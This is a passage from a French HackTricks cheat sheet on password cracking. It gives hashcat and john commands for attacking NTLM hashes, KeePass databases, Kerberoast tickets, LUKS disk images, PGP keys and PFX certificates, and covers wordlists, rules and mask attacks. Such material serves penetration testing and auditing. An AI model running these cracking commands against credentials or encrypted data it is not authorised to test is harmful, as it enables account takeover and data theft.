hashcat -a 0 -m 1000 --username file_NTLM.hashes /usr/share/wordlists/rockyou.txt --potfile-path salida_NT.pot
|
||
```
|
||
### Keepass
|
||
```bash
|
||
sudo apt-get install -y kpcli #Install keepass tools like keepass2john
|
||
keepass2john file.kdbx > hash #The keepass is only using password
|
||
keepass2john -k <file-password> file.kdbx > hash # The keepass is also using a file as a needed credential
|
||
#The keepass can use a password and/or a file as credentials, if it is using both you need to provide them to keepass2john
|
||
john --wordlist=/usr/share/wordlists/rockyou.txt hash
|
||
```
|
||
### Keberoasting
|
||
```bash
|
||
john --format=krb5tgs --wordlist=passwords_kerb.txt hashes.kerberoast
|
||
hashcat -m 13100 --force -a 0 hashes.kerberoast passwords_kerb.txt
|
||
./tgsrepcrack.py wordlist.txt 1-MSSQLSvc~sql01.medin.local~1433-MYDOMAIN.LOCAL.kirbi
|
||
```
|
||
### Image Lucks
|
||
|
||
#### Méthode 1
|
||
|
||
Installation : [https://github.com/glv2/bruteforce-luks](https://github.com/glv2/bruteforce-luks)
|
||
```bash
|
||
bruteforce-luks -f ./list.txt ./backup.img
|
||
cryptsetup luksOpen backup.img mylucksopen
|
||
ls /dev/mapper/ #You should find here the image mylucksopen
|
||
mount /dev/mapper/mylucksopen /mnt
|
||
```
|
||
#### Méthode 2
|
||
```bash
|
||
cryptsetup luksDump backup.img #Check that the payload offset is set to 4096
|
||
dd if=backup.img of=luckshash bs=512 count=4097 #Payload offset +1
|
||
hashcat -m 14600 -a 0 luckshash wordlists/rockyou.txt
|
||
cryptsetup luksOpen backup.img mylucksopen
|
||
ls /dev/mapper/ #You should find here the image mylucksopen
|
||
mount /dev/mapper/mylucksopen /mnt
|
||
```
|
||
### Mysql
|
||
|
||
Un autre tutoriel de BF Luks : [http://blog.dclabs.com.br/2020/03/bruteforcing-linux-disk-encription-luks.html?m=1](http://blog.dclabs.com.br/2020/03/bruteforcing-linux-disk-encription-luks.html?m=1)
|
||
```bash
|
||
#John hash format
|
||
<USERNAME>:$mysqlna$<CHALLENGE>*<RESPONSE>
|
||
dbuser:$mysqlna$112233445566778899aabbccddeeff1122334455*73def07da6fba5dcc1b19c918dbd998e0d1f3f9d
|
||
```
|
||
### Clé privée PGP/GPG
|
||
```bash
|
||
gpg2john private_pgp.key #This will generate the hash and save it in a file
|
||
john --wordlist=/usr/share/wordlists/rockyou.txt ./hash
|
||
```
|
||
### Cisco
|
||
|
||
<figure><img src="../.gitbook/assets/image (239).png" alt=""><figcaption></figcaption></figure>
|
||
|
||
### Clé principale DPAPI
|
||
|
||
Utilisez [https://github.com/openwall/john/blob/bleeding-jumbo/run/DPAPImk2john.py](https://github.com/openwall/john/blob/bleeding-jumbo/run/DPAPImk2john.py) puis john
|
||
|
||
### Colonne protégée par mot de passe Open Office
|
||
|
||
Si vous avez un fichier xlsx avec une colonne protégée par un mot de passe, vous pouvez la déprotéger :
|
||
|
||
* **Téléchargez-la sur Google Drive** et le mot de passe sera automatiquement supprimé
|
||
* Pour **retirer** le mot de passe **manuellement** :
|
||
```bash
|
||
unzip file.xlsx
|
||
grep -R "sheetProtection" ./*
|
||
# Find something like: <sheetProtection algorithmName="SHA-512"
|
||
hashValue="hFq32ZstMEekuneGzHEfxeBZh3hnmO9nvv8qVHV8Ux+t+39/22E3pfr8aSuXISfrRV9UVfNEzidgv+Uvf8C5Tg" saltValue="U9oZfaVCkz5jWdhs9AA8nA" spinCount="100000" sheet="1" objects="1" scenarios="1"/>
|
||
# Remove that line and rezip the file
|
||
zip -r file.xls .
|
||
```
|
||
### Certificats PFX
|
||
```bash
|
||
# From https://github.com/Ridter/p12tool
|
||
./p12tool crack -c staff.pfx -f /usr/share/wordlists/rockyou.txt
|
||
# From https://github.com/crackpkcs12/crackpkcs12
|
||
crackpkcs12 -d /usr/share/wordlists/rockyou.txt ./cert.pfx
|
||
```
|
||
<figure><img src="../.gitbook/assets/image (3) (1) (1).png" alt=""><figcaption></figcaption></figure>
|
||
|
||
\
|
||
Utilisez [**Trickest**](https://trickest.com/?utm_campaign=hacktrics&utm_medium=banner&utm_source=hacktricks) pour construire et **automatiser des workflows** facilement, alimentés par les outils communautaires **les plus avancés**.\
|
||
Obtenez un accès dès aujourd'hui :
|
||
|
||
{% embed url="https://trickest.com/?utm_campaign=hacktrics&utm_medium=banner&utm_source=hacktricks" %}
|
||
|
||
## Outils
|
||
|
||
**Exemples de hash :** [https://openwall.info/wiki/john/sample-hashes](https://openwall.info/wiki/john/sample-hashes)
|
||
|
||
### Hash-identifier
|
||
```bash
|
||
hash-identifier
|
||
> <HASH>
|
||
```
|
||
### Listes de mots
|
||
|
||
* **Rockyou**
|
||
* [**Probable-Wordlists**](https://github.com/berzerk0/Probable-Wordlists)
|
||
* [**Kaonashi**](https://github.com/kaonashi-passwords/Kaonashi/tree/master/wordlists)
|
||
* [**Seclists - Mots de passe**](https://github.com/danielmiessler/SecLists/tree/master/Passwords)
|
||
|
||
### **Outils de génération de listes de mots**
|
||
|
||
* [**kwprocessor**](https://github.com/hashcat/kwprocessor)** :** Générateur avancé de parcours clavier avec caractères de base, carte de clavier et itinéraires configurables.
|
||
```bash
|
||
kwp64.exe basechars\custom.base keymaps\uk.keymap routes\2-to-10-max-3-direction-changes.route -o D:\Tools\keywalk.txt
|
||
```
|
||
### Mutation John
|
||
|
||
Lisez _**/etc/john/john.conf**_ et configurez-le
|
||
```bash
|
||
john --wordlist=words.txt --rules --stdout > w_mutated.txt
|
||
john --wordlist=words.txt --rules=all --stdout > w_mutated.txt #Apply all rules
|
||
```
|
||
### Hashcat
|
||
|
||
#### Attaques Hashcat
|
||
|
||
* **Attaque par liste de mots** (`-a 0`) avec règles
|
||
|
||
**Hashcat** est déjà fourni avec un **dossier contenant des règles** mais vous pouvez trouver [**d'autres règles intéressantes ici**](https://github.com/kaonashi-passwords/Kaonashi/tree/master/rules).
|
||
```
|
||
hashcat.exe -a 0 -m 1000 C:\Temp\ntlm.txt .\rockyou.txt -r rules\best64.rule
|
||
```
|
||
* **Attaque par combinaison de wordlist**
|
||
|
||
Il est possible de **combiner 2 wordlists en 1** avec hashcat.\
|
||
Si la liste 1 contient le mot **"hello"** et la seconde contient 2 lignes avec les mots **"world"** et **"earth"**. Les mots `helloworld` et `helloearth` seront générés.
|
||
```bash
|
||
# This will combine 2 wordlists
|
||
hashcat.exe -a 1 -m 1000 C:\Temp\ntlm.txt .\wordlist1.txt .\wordlist2.txt
|
||
|
||
# Same attack as before but adding chars in the newly generated words
|
||
# In the previous example this will generate:
|
||
## hello-world!
|
||
## hello-earth!
|
||
hashcat.exe -a 1 -m 1000 C:\Temp\ntlm.txt .\wordlist1.txt .\wordlist2.txt -j $- -k $!
|
||
```
|
||
* **Attaque par masque** (`-a 3`)
|
||
```bash
|
||
# Mask attack with simple mask
|
||
hashcat.exe -a 3 -m 1000 C:\Temp\ntlm.txt ?u?l?l?l?l?l?l?l?d
|
||
|
||
hashcat --help #will show the charsets and are as follows
|
||
? | Charset
|
||
===+=========
|
||
l | abcdefghijklmnopqrstuvwxyz
|
||
u | ABCDEFGHIJKLMNOPQRSTUVWXYZ
|
||
d | 0123456789
|
||
h | 0123456789abcdef
|
||
H | 0123456789ABCDEF
|
||
s | !"#$%&'()*+,-./:;<=>?@[\]^_`{|}~
|
||
a | ?l?u?d?s
|
||
b | 0x00 - 0xff
|
||
|
||
# Mask attack declaring custom charset
|
||
hashcat.exe -a 3 -m 1000 C:\Temp\ntlm.txt -1 ?d?s ?u?l?l?l?l?l?l?l?1
|
||
## -1 ?d?s defines a custom charset (digits and specials).
|
||
## ?u?l?l?l?l?l?l?l?1 is the mask, where "?1" is the custom charset.
|
||
|
||
# Mask attack with variable password length
|
||
## Create a file called masks.hcmask with this content:
|
||
?d?s,?u?l?l?l?l?1
|
||
?d?s,?u?l?l?l?l?l?1
|
||
?d?s,?u?l?l?l?l?l?l?1
|
||
?d?s,?u?l?l?l?l?l?l?l?1
|
||
?d?s,?u?l?l?l?l?l?l?l?l?1
|
||
## Use it to crack the password
|
||
hashcat.exe -a 3 -m 1000 C:\Temp\ntlm.txt .\masks.hcmask
|
||
```
|
||
* Attaque Wordlist + Masque (`-a 6`) / Masque + Wordlist (`-a 7`)
|
||
```bash
|
||
# Mask numbers will be appended to each word in the wordlist
|
||
hashcat.exe -a 6 -m 1000 C:\Temp\ntlm.txt \wordlist.txt ?d?d?d?d
|
||
|
||
# Mask numbers will be prepended to each word in the wordlist
|
||
hashcat.exe -a 7 -m 1000 C:\Temp\ntlm.txt ?d?d?d?d \wordlist.txt
|
||
```
|
||
#### Modes Hashcat
|
||
```bash
|
||
hashcat --example-hashes | grep -B1 -A2 "NTLM"
|
||
```
|
||
### Craquage de Hashes Linux - fichier /etc/shadow
|
||
```
|
||
500 | md5crypt $1$, MD5(Unix) | Operating-Systems
|
||
3200 | bcrypt $2*$, Blowfish(Unix) | Operating-Systems
|
||
7400 | sha256crypt $5$, SHA256(Unix) | Operating-Systems
|
||
1800 | sha512crypt $6$, SHA512(Unix) | Operating-Systems
|
||
```
|
||
### Craquage des Hashes Windows
|
||
```
|
||
3000 | LM | Operating-Systems
|
||
1000 | NTLM | Operating-Systems
|
||
```
|
||
### Craquage des hachages d'applications courantes
|
||
```
|
||
900 | MD4 | Raw Hash
|
||
0 | MD5 | Raw Hash
|
||
5100 | Half MD5 | Raw Hash
|
||
100 | SHA1 | Raw Hash
|
||
10800 | SHA-384 | Raw Hash
|
||
1400 | SHA-256 | Raw Hash
|
||
1700 | SHA-512 | Raw Hash
|
||
```
|
||
<details>
|
||
|
||
<summary><a href="https://cloud.hacktricks.xyz/pentesting-cloud/pentesting-cloud-methodology"><strong>☁️ HackTricks Cloud ☁️</strong></a> -<a href="https://twitter.com/hacktricks_live"><strong>🐦 Twitter 🐦</strong></a> - <a href="https://www.twitch.tv/hacktricks_live/schedule"><strong>🎙️ Twitch 🎙️</strong></a> - <a href="https://www.youtube.com/@hacktricks_LIVE"><strong>🎥 Youtube 🎥</strong></a></summary>
|
||
|
||
* Travaillez-vous dans une **entreprise de cybersécurité** ? Voulez-vous voir votre **entreprise annoncée dans HackTricks** ? ou souhaitez-vous accéder à la **dernière version du PEASS ou télécharger HackTricks en PDF** ? Consultez les [**PLANS D'ABONNEMENT**](https://github.com/sponsors/carlospolop)!
|
||
* Découvrez [**La Famille PEASS**](https://opensea.io/collection/the-peass-family), notre collection d'[**NFTs**](https://opensea.io/collection/the-peass-family) exclusifs
|
||
* Obtenez le [**merchandising officiel PEASS & HackTricks**](https://peass.creator-spring.com)
|
||
* **Rejoignez le** [**💬**](https://emojipedia.org/speech-balloon/) [**groupe Discord**](https://discord.gg/hRep4RUj7f) ou le [**groupe telegram**](https://t.me/peass) ou **suivez-moi** sur **Twitter** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/hacktricks\_live)**.**
|
||
* **Partagez vos astuces de hacking en soumettant des PRs au** [**dépôt hacktricks**](https://github.com/carlospolop/hacktricks) **et au** [**dépôt hacktricks-cloud**](https://github.com/carlospolop/hacktricks-cloud).
|
||
|
||
</details>
|
||
|
||
<figure><img src="../.gitbook/assets/image (3) (1) (1).png" alt=""><figcaption></figcaption></figure>
|
||
|
||
\
|
||
Utilisez [**Trickest**](https://trickest.com/?utm\_campaign=hacktrics\&utm\_medium=banner\&utm\_source=hacktricks) pour construire et **automatiser facilement des workflows** grâce aux outils communautaires **les plus avancés**.\
|
||
Accédez-y dès aujourd'hui :
|
||
|
||
{% embed url="https://trickest.com/?utm_campaign=hacktrics&utm_medium=banner&utm_source=hacktricks" %}
|